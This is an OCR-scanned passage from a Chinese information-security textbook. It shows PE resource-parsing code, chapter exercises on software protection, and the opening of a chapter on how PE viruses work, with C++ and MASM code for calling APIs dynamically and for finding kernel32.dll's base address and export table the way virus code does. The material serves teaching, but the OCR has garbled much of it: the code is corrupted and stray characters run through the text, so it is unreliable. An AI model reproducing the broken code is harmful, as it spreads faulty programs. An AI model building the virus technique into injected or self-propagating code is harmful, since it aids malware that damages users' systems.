psection header.(int)nt header FileHeaderNumberOfSections): 

if(SRCrva—O0xFFFFFFFF)( 

m list.AddString(" 寻 找 资源 节 首 RVA 失败 "); 
return: 

) 

inf Format(".…. 分 析 : %s， 长 度 =%xh F 15......".m Efile fp.GetLengthO); 

m list.AddString(inf): 

infFormat(" 资 源 节 名 %6s Ju 96d 节 (从 0 开始 ). 文 件 偏 移 9txh-RVA 偏 移 %xh".psection_header 
[rscSection] Name. rscSection, 

psection header[rscSection].PointerToRawData, psection_header[rscSection].VirtualAddress); 

m list.AddString(inf): 

inf Format(" 实 际 大 小 %6xh. 文 件 对 齐 后 大 小 %xh. 节 属性 值 *exh".psection_ header[rscSection].Misc. 
VirtualSize.psection header[rscSection].SizeOfRawData.psection header[rscSection].Characteristics): 

m list. AddString(inf): 

// 读 第 1 层 目录 

IMAGE RESOURCE DIRECTORY res; 

IMAGE RESOURCE DIRECTORY ENTRY *pentry: 

fp.Seek(fileOffset,CFile::begin): 

fp.Read(&res,sizeofflMAGE RESOURCE DIRECTORY): 

/后 面 跟 有 res.NumberOfNamedEntries-res.NumberOfldEntries 个 

/IMAGE RESOURCE DIRECTORY ENTRY 结构 

pentry=new IMAGE RESOURCE DIRECTORY ENTRY [res.NumberOfNamedEntries 

"res. NumberOfldEntries]: 

fp-Read(pentry,sizeoffIMAGE RESOURCE DIRECTORY ENTRY)*( 

res.NumberOfNamedEntries--res.NumberOfIdEntries)): 

/第 1 层 ， 为 资源 类 型 

int num=res.NumberOfNamedEntries+res.NumberOfldEntries; 

CString curType=""; /资源 类 型 


for(int i=0:i<num:i++) { 
m list .AddStringC—— ms. AT ' J: 
infFormat(" 第 1 层 (类 型 层 ):，%3 由 资源 类 型 :".i+1): 
switch(pentry[i].Name) ( 


case RT CURSOR: 
inf--"RT CURSOR": 
curType-"RT CURSOR": 
break; 

case RT BITMAP: 
inf«-"RT BITMAP": 
curType-"RT. BITMAP": 
break; 

case RT ICON: 
inf--"RT ICON": 
curType-"RT ICON": 
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break 

case RT MENU: 
inf--"RT MENU": 
curType-"RT MENU": 
break: 

case RT DIALOG: 
inf--"RT DIALOG": 
curType-"RT DIALOG": 
break: 

case RT STRING: 
inf--"RT STRING": 
curType-"RT STRING"; 
break: 

case RT FONTDIR: 
inf-—"RT FONTDIR"; 
curType-"RT FONTDIR": 
break: 

case RT FONT: 
inf--"RT FONT": 
curType-"RT FONT": 
break: 

case RT ACCELERATOR: 
inf--"RT ACCELERATOR"; 
curType-"RT ACCELERATOR"; 
break: 

case RT RCDATA: 
inf--"RT RCDATA"; 
curType-"RT RCDATA"; 
break; 

case RT MESSAGETABLE: 
inf--"RT MESSAGETABLE": 
curType-"RT MESSAGETABLE": 
break: 

case RT GROUP CURSOR: 
inf--"RT GROUP CURSOR": 
curType-"RT GROUP CURSOR": 
break; 

case RT GROUP ICON: 
inf--"RT GROUP ICON": 
curType-"RT GROUP ICON": 
break; 
case RT HTML: 
inf--"RT HTML": 
curType-"RT HTML": 


*6l* 
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break 
case RT PLUGPLAY: 
inf-"RT PLUGPLAY 播放 的 资源 ": 
curType="RT_PLUGPLAY 播放 的 资源 ": 
break 
case RT VERSION: 
inf--"RT VERSION": 
curType-"RT VERSION": 
break: 
case RT VXD: 
infr="RT VXD": 
curType-"RT VXD": 
break: 
case RT ANICURSOR: 
inf-"RT ANICURSOR": 
curType-"RT ANICURSOR": 
break: 
case RT ANIICON: 
infr="RT ANIICON": 
curType-"RT ANIICON": 


break: 
default: 

infe-" 自 定义 资源 "; 
curType=” 自 定义 资源 "; 
break: 


) 

m list.AddString(inf): 

J/OffsetToData 高 位 是 1, 为 下 层 目录 块 的 开始 地 址 相对 于 资源 块 的 偏 移 

DWORD rva2=pentry[i].OffsetToData&0x7FFFFFFF:/ 去 高 位 ， 下 层 相对 资源 节 的 偏 移 

IRVA2 + 资源 块 首 地址 ， 为 下 层 目录 的 realRVA 

//fileOffset 为 下 层 目录 的 文件 偏 移 

DWORD realRVA=SRCrva+rva2; 

fileOffset=RVAtoFileOffset(realR VA. 

psection header.(int)nt header.FileHeader.NumberOfSections. 

nt header.OptionalHeader.SectionAlignment): 

// 读 第 2 层 目录 

IMAGE RESOURCE DIRECTORY lay2: 

IMAGE RESOURCE DIRECTORY ENTRY *pry2-NULL; 

fp.Seek(fileOffset.CFile::begin): 

fp.Read(&lay2,sizeoffMAGE RESOURCE. DIRECTORY): 

infFommat" 第 2JZ(D 与 名 称 层 ) 以 名 称 命名 的 %s 类 型 个 数 
%d".curType,lay2.NumberOfNamedEntries): 

m list.AddString(inf): 

infFormat(" 第 2 层 (ID 与 名 称 层 ) 以 ID 命名 的 9%s 类 型 个 数 


第 2 章 软件 安全 “63 


%d".curTypelay2.NumberOffdEntries): 
m list AddString(inf): 
// 后 面 跟 有 lay2 NumberOfNamedEntries+res NumberOfldEntries 个 
//IMAGE RESOURCE DIRECTORY ENTRY 结构 
if(lay2.NumberOfNamedEntries-lay2 NumberOfIdEntries—O)continue; 
pry2=new IMAGE RESOURCE DIRECTORY ENTRY[lay2.NumberOfNamedEntries 
-Hay2.NumberOflIdEntries]: 
fp.Read(pry2.sizeoffIMAGE RESOURCE DIRECTORY ENTRY)*( 
lay2.NumberOfNamedEntries-Hay2.NumberOfldEntries)): 
for(int j-0:j-lay2.NumberOfNamedEntries-lay2 NumberOfldEntries:j—) í 
这 pry2[0]Name&0x80000000){/ 高 位 为 1，Name 指向 UNICODE 字符 串 的 资源 名 
DWORD 12=SRCrva+pry2[j] Name&0x7FFFFFFF; 
fileOffset-RVAtoFileOffset(D., 
psection header.(int)nt header.FileHeader.NumberOfSections, 
nt header.OptionalHeader.SectionAlignment): 
WORD str len=0: 
fp.Seek(fileOffset.CFile::begin): 
fp.Read(&str len.2); 
BYTE ০1512] 
memset(ch.0,512); 
fp.Read(ch.(int)str len): 
/转换 为 ASCII 串 
char name[256]: 
memset(name.0.256): 
for(int j1=0:j1<(int)str_len:jJ1++)name[j1]=((char*)ch)[2*j1]: 
inf Fomat(" <%d> 资 源 名 ="j+1); 
inf-—name; 
) 
else í /高 位 为 0 
inf.Format(" <%d> 资 源 ID=%4".j+1.pry2[j] Name): 
) 
m listAddSuing(nf: /资源 名 
/进入 第 三 层 ， 代 码 页 
/去 掉 高 位 ， 为 下 目录 数据 相对 资源 节 的 偏 移 
DWORD 13=pry2[j].OffsetToData&0x7FFFFFFF: 
13+=SRCrva; /下 层 目录 RVA 
fileOffset=RVAtoFileOffset(13. 
psection header.(int)nt header.FileHeader.NumberOfSections. 
nt header.OptionalHeader.SectionAlignment): 
// 读 第 3 层 目录 
IMAGE RESOURCE DIRECTORY lay3: 
IMAGE RESOURCE DIRECTORY ENTRY *pry3=NULL: 
fp.Seek(fileOffset.CFile::begin); 
fp.Read(&lay3.sizeofflMAGE RESOURCE DIRECTORY)): 
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/后 面 跟 有 1lay3 NumberOfNamedEntries+res.NumberOfldEntries 个 

MAGE RESOURCE DIRECTORY ENTRY 结构 

if(lay3.NumberOfNamedEntries-ay3.NumberOfldEntries—O)continue: 

pry3-new IMAGE RESOURCE DIRECTORY ENTRY[lay3.NumberOfNamedEntries 

-Hay3.NumberOfldEntries]: 

fp.Read(pry3.sizeofMAGE RESOURCE DIRECTORY ENTRY)*( 

lay3.NumberOfNamedEntries-lay3.NumberOfldEntries)): 

infFormat("58 3 层 (语言 页 ) 项 目 数 %d".lay3.NumberOfNamedEntries+ 
lay3.NumberOfIdEntries): 

m list.AddString(inf): 

1/ 进入 第 4 层 

for(int k=0:k<lay3 NumberOfNamedEntries+lay3.NumberOfldEntries:k++) ( 

inf.Format(" (6d) f C83 08895207610” K-1.pry3[k].Name.pry3[k].OffsetToData): 

m list. AddString(inf): 

IMAGE RESOURCE DATA ENTRY dataRsc: 

fileOffset-RVAtoFileOffset(pry3[k].OffsetToData* SRCrva, 

psection header.(int)nt header.FileHeader.NumberOfsSections, 

nt header.OptionalHeader.SectionAlignment): 

DWORD mid-fileOffset; 

fp.Seek(fileOffset,CFile::begin): 

fp.Read(&dataRsc,sizeofflMAGE RESOURCE DATA ENTRY): 

inf Format(" 第 4 层 ( 数 据 入 口 )%d: 数 据 资源 RVA=%6xh. 文 件 偏 移 =%xh. 文 件 长 =%xh",k+1, 

dataRsc.OffsetToData.fileOffset.fp.GetLength()): 

m list.AddString(inf): 

fileOffset-RVAtoFileOffset(dataRsc.OffsetToData, 

psection header.(int)nt header.FileHeader.NumberOfSections, 

nt header.OptionalHeader.SectionAlignment); 

inf Fomat(" 资 源 数据 RVA 指针 OffsetToData 的 文件 偏 移 =%xh， 当 前 值 =%6xh",mid. 

dataRsc.OffsetToData): 

m list.AddString(inf): 

inf Fommat(" 资 源 数据 RVA=%xh. 文 件 偏 移 =%xh, 长 度 =%xh",dataRsc.OffsetToData, 
fileOffset.dataRsc.Size): 

m list. AddString(inf): 

) 


} 
} 
fp.Close0: 
) 
程序 的 执行 结果 如 图 2-43 所 示 。 


可 见 ， 软 件 的 汉化 就 是 修改 软件 的 资源 部 分 。 
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图 2-43 资源 结构 


2.11 小 结 


本 章 的 重点 是 共享 软件 的 常用 保护 方法 的 使 用 ， 如 软件 的 功能 限制 、 防 拷贝 、 防 自 改 


和 加 密 等 。 


9v EA gue 15. B3: কি 


密 吗 ? 


2.12 习题 


设计 有 日 期 限制 的 应 用 程序 。 

设计 有 要 求 输入 序列 号 的 安装 程序 。 

设计 有 水 印 保护 的 图 片 浏览 程序 。 

设计 使 用 硬盘 序列 号 来 防 拷贝 的 软件 。 

使 用 MD5 来 防止 软件 被 算 改 。 

本 章 的 软件 代码 加 密使 用 很 简单 的 异 或 ， 你 能 实现 对 代码 部 分 进行 如 AES 的 加 
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本 章 介绍 病毒 的 原理 与 所 使 用 的 技术 ， 以 及 预防 病毒 的 方法 ， 主 要 内 容 如 下 
e 常见 病毒 的 工作 原理 ; 

° 可 执行 文件 病毒 修改 文件 的 方法 ; 

° 可 执行 文件 病毒 使 用 的 常用 技术 

° ”优化 可 执行 文件 防 病毒 ; 

e 文件 过 滤 驱 动 在 反 病 毒 上 的 应 用 。 


3.1 病毒 概述 


“计算 机 病毒 ”最 早 是 由 美国 计算 机 病毒 研究 专家 F.Cohen 博士 提出 的 。“ 计 算 机 病 
毒 ” 有 很 多 种 定义 ， 国 外 流行 的 定义 为 : 是 一 段 附着 在 其 他 程序 上 的 可 以 实现 自我 繁殖 的 
程序 代码 。 在 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》 中 的 定义 为 : “计算 机 病 
毒 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 数据 ， 影 响 计 算 机 使 用 并 且 能 
人 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 

世界 上 第 一 例 被 证 实 的 计算 机 病毒 是 在 1983 年 ， 出 现 了 计算 机 病毒 传播 的 研究 报告 。 
同时 有 人 提出 了 蠕虫 病毒 程序 的 设计 思想 ; 1984 年 , 美国 人 Thompson 开发 出 了 针对 UNIX 
操作 系统 的 病毒 程序 。1988 年 11 月 2 日 晚 ， 美 国 康 尔 大 学 研究 生 罗 特 。 莫 里 斯 将 计算 机 
病毒 蠕虫 投放 到 网 络 中 。 该 病毒 程序 迅速 扩展 ， 造 成 了 大 批 计算 机 瘫痪 ， 甚 至 欧洲 联网 的 
计算 机 都 受到 影响 ， 直 接 经 济 损失 近 亿 美元 。 

计算 机 病毒 是 人 为 编写 的 ， 具 有 自我 复制 能 力 ， 是 未 经 用 户 允 许 执行 的 代码 。 一 般 正 
常 的 程序 是 由 用 户 调用 ， 再 由 系统 分 配 资 源 ， 完 成 用 户 交 给 的 任务 。 其 目的 对 用 户 是 可 见 
的 、 透 明 的 。 而 病毒 具有 正常 程序 的 一 切 特性 ， 它 隐藏 在 正常 程序 中 ， 当 用 户 调用 正常 程 
序 时 窃取 到 系统 的 控制 权 ， 先 于 正常 程序 执行 ， 病 毒 的 动作 、 目 的 对 用 户 是 未 知 的 和 未 经 
用 户 允 许 的 。 它 的 主要 特征 有 传染 性 、 隐 蔽 性 、 潜 伏 性 、 破 坏 性 和 不 可 预见 性 。 传 染 性 是 
病毒 最 重要 的 一 条 特性 。 

按照 计算 机 病毒 侵入 的 系统 分 类 ， 分 为 DOS 系统 下 的 病毒 、Windows 系统 下 的 病毒 、 
UNIX 系统 下 的 病毒 和 OS/2 系统 下 的 病毒 。 按照 计算 机 病毒 的 链接 方式 分 类 可 分 为 源码 型 
病毒 、 嵌 入 型 病毒 、 外 壳 型 病毒 。 按 照 传 播 介质 分 类 ， 可 分 为 单机 病毒 和 网 络 病毒 。 

随 着 Windows 系统 的 发 展 ， 引 导 型 病毒 已 经 消失 ， 宏 病毒 也 少见 。 目 前 见得 较 多 的 是 
感染 本 机 可 执行 文件 的 PE 病毒 和 通过 网 络 在 计算 机 之 问 传播 的 蠕虫 病毒 。 
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Windows 下 常见 的 可 执行 文件 ， 一 种 是 二 进 制 文件 ， 即 扩展 名 为 exe, dll. src 和 sys 
等 的 文件 ， 这 些 文件 的 执行 是 由 explorerexe( 资 源 管理 器 )、cmd.exe( 控 制 台 ， 类 似 DOS 界 
面 或 其 他 程序 调用 执行 的 ， 另 一 种 是 文本 格式 文件 ， 例 如 扩展 名 为 htm 和 html， 可 以 由 
iexplorer.exe 调用 ， 由 script.exe 来 解释 执行 的 文件 。 

ÉI Windows 2000 以 后 , 二进制 文件 为 PE 结构 ,PE 的 意思 就 是 可 移植 的 执行 体 (Portable 
Executable)， 是 Windows 的 32 位 环境 自身 所 带 的 执行 体 文件 格式 。 它 的 一 些 特 性 继承 自 
UNIX 的 Coff(common object file format) 文 件 格 式 ， 同 时 为 了 保证 与 旧版 本 MS-DOS 及 
Windows 操作 系统 的 兼容 ，PE 文件 格式 也 保留 了 MS-DOS 中 的 MZ 头 部 。 病 毒 能 够 感染 
PE 文件 ， 因 为 病毒 设计 者 深 知 其 结构 。 


3.2.1 PE 病毒 常用 技术 
病毒 也 和 正常 的 应 用 程序 一 样 ， 涉 及 函数 的 调用 和 变量 的 使 用 。 
1. 调用 API 函数 的 方法 


API 是 Application Programming Interface 的 英文 缩写 ， 很 像 DOS 下 的 中 断 。 中 断 是 系 
统 提供 的 功能 ， 在 DOS 运行 后 就 被 装载 在 内 存 中 ， 而 API 函数 是 当 应 用 程序 运行 时 ， 通 
过 将 函数 所 在 的 动态 链接 库 装 载 到 内 存 后 调用 函数 的 。 可 在 MSDN 的 “索引 ”中 输入 函数 
MessageBox 然后 按 Enter 键 ， 就 可 以 查 到 该 函数 的 使 用 方法 。MSDN 是 微软 提供 的 开发 帮 
助 文档 ， 是 在 Windows 下 编程 必 备 的 资料 文件 。 

在 Windows 下 设计 应 用 程序 不 直接 或 间接 使 用 API 是 不 可 能 的 ， 有 些 高 级 语言 看 似 
没有 使 用 API， 只 不 过 它们 提供 的 模块 对 API 进 了 封装 而 已 。 

API 的 使 用 分 为 静态 和 动态 两 种 方式 。 在 源 程序 中 调用 API 两 种 方式 都 可 以 使 用 ， 但 
对 未 公开 的 API， 因 为 无 相应 的 头 文件 ， 只 能 使 用 动态 方式 。 下 面 以 VC++ 中 调用 
MessageBox 说 明 这 两 种 方式 的 区 别 。 

0) 静态 方式 

char note_inf[]=" 谢 谢 使 用 ": 
char note head[]-"J&zr fri E": 
:MessageBox(0, note inf note_head.MB_OK):”//:: 表 示 全 局 函数 

反 汇 编 结果 如 图 3-1 所 示 。“PUSH 00000000” 对 应 的 是 MB OK it A, “PUSH 
0040302C” 对 应 的 是 一 个 字符 串 的 偏 移 地 址 入 栈 ，“PUSH 00403020” 对 应 的 是 男 一 个 字 
符 串 偏 移 地 址 的 入 栈 ， 第 2 行 “PUSH 00000000” 对 应 窗口 句柄 入 栈 。 当 程序 执行 时 ， 装 
载 器 会 将 user32.dll 装载 到 应 用 程序 虚拟 空间 ， 同 时 将 MessageBoxA( 对 应 ANSI 格式 ， 另 

-种 为 UNICODE 格式 ， 用 MessageBoxW 表示 。 这 是 因为 函数 的 参数 有 字符 串 ， 而 字符 
串 有 两 种 格式 ) 的 入 口 地 址 填充 到 虚拟 地 址 004021B8h。 
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虚拟 地 址 004021B8h 是 由 PE 头 中 IMAGE DATA DIRECTORY 数组 来 定位 的 , 当 编 
译 器 生成 PE 文件 时 就 计算 好 了 。 


ISER32. MessageBozA| 


图 3-1 API 的 汇编 调用 


Q) 动态 方式 
动态 方式 先 定义 函数 指针 ， 使 用 函数 LoadLibrary 装载 要 调用 的 函数 所 在 的 dll 文件 ， 
获取 模块 句柄 ， 然 后 调用 GetProcAddress 获取 要 调用 的 函数 地 址 。 


void CTestDlg::OnButton 
€ 
/定义 MessageBox 函数 指针 
typedef int (WINAPI * MessageBox)( 
HWND hWnd, 
LPCTSTR IpText, 
LPCTSTR lpCaption, 
UINT uType 
x 
/定义 MessageBox 指针 变量 
 MessageBox new MessageBox: 
/装载 MessageBox 函数 所 在 的 dll 文件 
HINSTANCE hb-LoadLibrary("user32 dll"); 
/获取 ANSI 格 式 的 MessageBox 函数 地 址 
new MessageBox-( MessageBox)GetProcAddress(hb."MessageBoxA"); 
/动态 调用 函数 MessageBox 
Dew_MessageBox(0." 欢 迎 使 用 !"," 提 示 信息 "MB_ORK): 
/释放 MessageBox 函数 所 在 模块 
CloseHandle(hb): 
) 


动态 方式 是 在 需要 调用 函数 时 才 将 函数 所 在 模块 调 入 到 内 存 的 ， 同 时 也 不 需要 编译 器 
为 该 函数 在 导入 表 中 建立 相应 的 项 。 
2. 病毒 调用 API 函数 


病毒 要 完成 相应 的 功能 ， 不 可 能 不 调用 API 函数 。 病 毒 感染 PE 文件 可 能 是 在 源 程序 
中 加 入 病毒 代码 , 但 多 数 是 在 生成 PE 文件 后 通过 修改 PE 文件 感染 的 。 对 后 种 情况 ， 病 毒 
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难以 去 为 使 用 的 API 建立 导入 表 项 ， 只 有 使 用 动态 方式 调用 API。 动 态 使 用 API 的 前 提 是 
预先 知道 LoadLibrary 和 GetProcAddress 的 地 址 ， 可 以 预先 设 定 或 搜索 API 的 地 址 实现 。 

一 个 正常 的 Windows 程序 , 它 至 少 需 要 调用 模块 kernel32.dll, 因为 应 用 程序 正常 退出 
时 需要 调用 函数 ExitProcess， 而 该 函数 位 于 模块 kernel32 dll 内 。 然 而 函数 LoadLibrary 和 
GetProcAddress 也 位 于 模块 kernel32.dll 内 。 既然 模块 kernel32.dll 总 在 内 存 ， 如 果 知 道 这 两 
个 函数 地 址 ， 直 接 调用 即 可 。 

(1) 检测 函数 地 址 

先 用 间接 方式 检测 函数 的 地 址 ， 代 码 如 下 ， 运 行 结果 如 图 3-2 所 示 。 


void CTestDlg::OnButton10 
{ 
/定义 函数 LoadLibrary 和 GetProcAddress 的 原型 
typedef HINSTANCE (WINAPI * LoadLibrary)( 
LPCTSTR IpLibFileName 
y; 
typedef FARPROC (WINAPI* GetProcAddress)( 
HMODULE hModule, 
LPCSTR IpProcName 
y; 
/定义 指针 
_LoadLibrary new LoadLibrary: 
. GetProcAddress new GetProcAddress; 
/装载 函数 所 在 模块 kernel32. dll 
HINSTANCE hb-LoadLibrary("kernel32.dll"): 
/获取 函数 首 地 址 
new LoadLibrary-( LoadLibrary)GetProcAddress(hb."LoadLibraryA"): 
new GetProcAddress-( GetProcAddress)GetProcAddress(hb."GetProcAddress"): 
/显示 结果 
CString inf. 
inf.Format("LoadLibrary -?oXh wnGetProcAddress-?oXh", 
new LoadLibrary.new GetProcAddress): 
:MessageBox(0.inf "地 址 信息 "MB_OR): 
CloseHandle(hb): 
) 


En > 


LoadLibrary = 0221h 
GetProcAddress=77E80CABh 


确定 


图 3-2 取 函 数 地 址 
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Q) 在 程序 中 直接 使 用 函数 地 址 
如 下 代码 直接 使 用 函数 LoadLibrary 和 GetProcAddress 的 地 址 ， 动 态 调用 函数 
MessageBox， 执 行 结 果 将 显示 一 个 信息 提示 对 话 框 。 


void CTestDlg::OnButton2() 
{ 
// 定 义 MessageBox 原型 
typedef int (WINAPI* MessageBox)( 
HWND hWnd, 
LPCTSTR IpText, 
LPCTSTR lpCaption, 
UINT uType 
y 
char funName[]-" MessageBoxA ": 
/定义 地 址 
DWORD LoadLibraryAddr =0x77E80221: 
DWORD GetProcAddressAddr =0x77E80CAB; 
 MessageBox new MessageBox: 
/定义 函数 所 在 模块 名 
HINSTANCE hb: 
char dlIName[]-"user32.dll": 
. asm( ;VC++ 中 嵌入 汇编 代码 


push eax 
mov ebx, LoadLibraryAddr 
call ebx :调用 LoadLibrary 获取 shell32.dll 模块 句柄 
mov hb, eax 
/直接 使 用 地 址 
lea eax.funName 
push eax 
push hb 
mov ebx,GetProcAddressAddr :调用 LoadLibrary 获取 shell32.dll 模块 句柄 
call ebx 
mov new MessageBox. eax 
) 
/动态 调用 MessageBox， 显 示 信 息 提 示 对 话 框 
new_MessageBox(0." 欢 迎 使 用 !"." 提 示 信 息 ",MB_OK); 
CloseHandle(hb): 
) 


预先 设 定 API 地 址 ， 使 得 代码 比较 短 ， 但 只 能 局 限 在 某 个 操作 系统 版 本 下 运行 ， 并 且 
必须 先 保证 它 所 在 模块 在 内 存 中 。 同 一 个 API 函数 ， 在 不 同 的 系统 下 的 地 址 可 能 不 相同 。 
该 方法 也 叫 “ 预 编码 ”技术 。 
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(3) 搜索 API 地 址 

只 需要 从 虚拟 内 存 搜索 到 LoadLibrary 和 GetProcAddress 的 地 址 ， 用 这 两 个 函数 就 可 
以 获取 其 他 函数 的 地 址 .前 面 已 经 介绍 过 , 一 般 程序 都 会 加 载 LoadLibrary 和 GetProcAddress 
所 在 的 库 文件 kernel32.dl， 那 么 在 内 存 中 搜索 kemel32.dll 所 在 基地 址 ， 然 后 再 分 析 
kernel32.dll 的 PE 结构 ， 就 可 以 找到 LoadLibrary 和 GetProcAddress 的 地 址 。 

分 析 多 个 Windows 系统 ,可 以 知道 kemel32.dll 加 载 的 大 致 地 址 ， 比 如 根据 在 9X 下 其 
加 载 地 址 是 0xBFF70000, 在 Windows 2000 下 加 载 基 址 是 0x77E80000, 然后 可 由 该 地 址 向 
高 地 址 搜索 找到 其 基 址 。 也 可 以 由 高 地 址 到 低地 址 开始 搜索 ， 搜 索 开 始 的 地 址 由 程序 入 口 
处 的 ESP 获得 。 程序 装载 器 调用 一 个 程序 后 将 程序 的 返回 地 址 入 栈 , 然后 转 去 执行 该 程序 。 
经 反 汇 编 证 明 ， 返 回 地 址 是 属于 Kernel32.dll 模块 中 。 由 于 内 存 属性 决定 ， 有 些 内 存 可 能 
因 未 分 配 而 不 能 读 ， 如 果 读 它 ， 将 导致 出 错 。 为 避免 因 错 误 而 导致 程序 不 能 继续 执行 ， 必 
须 使 用 SEH 处 理 。SHE 即 结构 化 异常 处 理 (Structured Exception Handling)， 是 Windows 操 
作 系 统 提供 给 程序 设计 者 的 强 有 力 的 处 理 程序 错误 或 异常 的 武器 ， 有 些 类 似 于 Visual C++ 
中 使 用 的 _try{} _finally{} 和 _try{} _except{}。 后 面 的 例子 使 用 了 从 这 些 地 址 向 高 地 址 搜索 
的 方法 。 

如 果 搜 索 到 Kemel32.DLL 的 加 载 地 址 ， 其 头 部 一 定 是 “MZ” 标志 ， 由 模块 起 始 偏 移 
0x3C 的 双 字 确定 e_lfanew， 再 由 e_lfanew 找到 的 PE 头 部 标志 必然 是 “PE”， 因 此 可 根据 
这 两 个 标志 判断 是 否 找 到 了 模块 加 载 地 址 。 经 实验 证 明 ， 该 判断 方法 非常 可 靠 ， 基 本 不 会 
出 现 错误 。 因 为 所 有 版 本 的 Windows 系统 下 Kernel32.DLL 的 加 载 基 址 都 是 按照 0x1000 对 
齐 的 ,根据 这 一 特点 可 以 不 必 逐 字 节 搜索 ,按照 0x1000 对 齐 的 边界 地 址 搜索 即 可 。 以 由 程 
序 入 口 处 的 ESP 为 例 ， 方 法 如 下 。 

下 面 的 代码 搜索 LoadLibrary 和 GetProcAddress 的 地 址 : 
.586p 
.model flat, stdcall 
option casemap :none: case sensitive 
include \masm32\include\windows.inc 
include umasm32Vncludekernel32.inc 
includelib \masm32\lib\kernel32.lib 
include \masm32\include\user32.inc 
includelib \masm32\lib\user32.lib 
GetApiAddress PROTO :DWORD.:DWORD 
.data 
Kernel32Addr dd ? 
ExportKemel dd ? 
GetProcAddr dd ? 
LoadLibrary Addr dd ? 
aGetProcAddr db "GetProcAddress".0 
GetProcAddLen equ $-aGetProcAddr-1 
aLoadLibrary db "LoadLibraryA".0 


qme 信息 安全 应 用 教程 


LoadLibraryLen equ $-aLoadLibrary-1 

szTitle db "检测 结果 ".0 

temp! db "Kernel32.dll 基本 地 址 :9%68x".0dh.0ah 
db "LoadLibrary 地 址 :%8x".0dh.0ah 

db "GetProcAddress 地 址 :%8x".0dh.0ah.0 
temp2 db 256 dup(?) 


Start: 
mov esi, [esp] ; esi 为 返回 地 址 所 在 的 页 ， 例 若 [esp]=77e78B94h.esi=77e78000h 
and 。 esiOfffff000h :转换 为 1000h 字 节 的 倍数 
LoopFindKernel32: 
sub — esi.1000h 
cmp word ptesi] ZM' ; 搜索 EXE 文件 头 
jaz short LoopFindKemel32 
GetPeHeader: 
mov edi.dword ptr[esi+3ch] ; 偏 移 3ch 处 为 "PE" 
add ediesi 
cmp word ptr[edi].4550h : 确认 是 否 PE 文件 头 
jnz short LoopFindKernel32 :esi->kemel32.edi->kemel32 PE HEADER 
mov Kernel32Addr.esi 
:获得 Kemel32.dll 中 的 所 需 的 API 的 线性 地 址 : 
invoke GetApiAddress, Kernel32Addr, addr aLoadLibrary 
mov LoadLibrary Addr, eax 
invoke GetApiAddress, Kernel32Addr, addr aGetProcAddr 
mov GetProcAddr, eax 
invoke wsprintf.addr temp2.addr temp1,Kernel32Addr, 
LoadLibraryAddr.GetProcAddr 
invoke MessageBoxA,0.addr temp2.addr szTitle.0 
invoke ExitProcess, 0 


হকফকসসফসফফফফসকফফফসকফকফককফসকফকফসফফককসকফসফফকফসফফকফসকফসফসকফসফফসফসকফফফস 


:函数 功能 ， 从 内 存 中 Kemel32.dll 的 导出 表 中 获取 某 个 API 的 入 口 地 址 
এককক ক কফ কক ক কফ ক ক কক. ক ক কফ ক ক ক কক ক কফ ক ক ক ক ক ক ক ক ক ক ক কক কক ক ক ক ক ক ক ক ক ক ক ক ক কক ক ক ক কফ ক কক ক ক 
GetApiAddress proc uses ecx ebx edx esi edi hModule:DWORD, szApiName:DWORD 
LOCAL dwRetum: DWORD 
LOCAL dwApiLength: DWORD 
mov dwRetum. 0 
:计算 API 字符 串 的 长 度 ( 带 尾部 的 0) 


mov esi, szApiName 


mov edx, esi 

Continue Searching Null: 
cmp byte ptr [esi]. 0 : 是 否 为 Null-terminated char ? 
jz We Got The Length : Yeah, we gotit. :) 


inc esi : No. continue searching. 
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jmp Continue Searching Null ; searching....... 
We_Got The Length: 
inc esi ; 呵呵 . 别 忘 了 还 有 最 后 一 个 “0” 的 长 度 。 
Sub esi edx ; esi = API Name size 
mov dwApiLength, esi ; dwApiLength = API Name size 
:从 PE 文件 头 的 数据 目录 获取 输出 表 的 地 址 
mov esi, hModule 


add esi, [esi + 3ch] 
assume esi: pr IMAGE NT HEADERS 
mov esi, [esi].OptionalHeader.DataDirectory.VirtualAddress 
add esi, hModule 
assume esiptr IMAGE EXPORT DIRECTORY: esi 指向 Kemel32.dll 的 输出 表 
:遍历 AddressOfNames 指向 的 数组 的 RVA 对 应 的 函数 名 字符 串 
:AddressOfNames 为 RVA， 指 向 一 个 RVA 数组 
:数组 为 DWORD 类 型 ， 是 RVA 值 ， 指 向 函数 名 字符 串 
:用 字符 串 名 描述 的 函数 的 个 数 在 NumberOfNames, 包 括 序号 引 


:出 的 总 数 在 AddressOfFunctions 
mov ebx, [esi].AddressOfNames 
add ebx, hModule :AddressOfNames 是 RVA, 还 要 加 上 基地 址 
xor edx, edx ;edx= 函 数 计数 值 ， 初 始 化 为 0. 每 查 一 个 函数 的 RVA 加 1 
repeat 
push esi :保存 esi， 后 面 会 用 到 
mov edi, [ebx] :edi= 导 出 表 中 函数 字符 串 的 RVA 
add edi, hModule : 别 忘 了 加 上 基地 址 
mov esi, szApiName :函数 名 字 的 首 地 址 
mov ecx, dwApiLength :函数 名 字 的 长 度 
cld :设置 方向 标志 DF=0. 地 址 递增 
repz cmpsb :比较 字符 串 ,直到 CX=0 
Af ZERO? :ZF=1, 找 到 了 
pop esi ;恢复 esi 
jmp _Find_Index :查找 该 函数 的 地 址 索引 
endif 
pop esi :恢复 esi 
add ebx, 4 :下 一 个 函数 名 的 RVA( 每 个 函数 占用 4 个 字 节 ) 
inc edx :增加 函数 计数 
„until edx >= [esi]. NumberOfNames :函数 个 数 已 经 大 于 记 数 的 总 数 NumberOfNames 
jmp Exit : 没 找到 ， 退 出 


:得 到 ebx X RVA 值 ，[ebx]+hModule 指向 函数 字符 串 
:函数 名 称 索引 -> 序号 索引 -> 地 址 索引 
AJ: APIs 地 址 = (API 的 序号 *4)+AddressOfFunctions 的 VA + Kernel32 基地 址 
Find Index: 
sub ebx, [esi].AddressOfNames :esi 就 指向 了 下 一 个 函数 的 首 地址 ， 所 以 要 先 减 掉 它 
sub ebx, hModule : 减 掉 基 地 址 ， 得 到 RVA 
shr ebx. 1 :要 除 以 2， 还 是 因为 repz cmpsb 那 行 
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add ebx, [esi].AddressOfNameOrdinals :AddressOfNameOrdinals 是 RVA， 指 向 


:包含 16 位 函数 序号 的 数组 
add ebx, hModule ;要 加 基地 址 
;函数 序号 *2+AddressOfFunctions+thModule 为 函数 地 址 值 的 地 址 
Imovzx eax, word ptr [ebx] :eax = API 的 序号 
shl eax, 2 ;要 乘 以 4 才 得 到 偏 移 
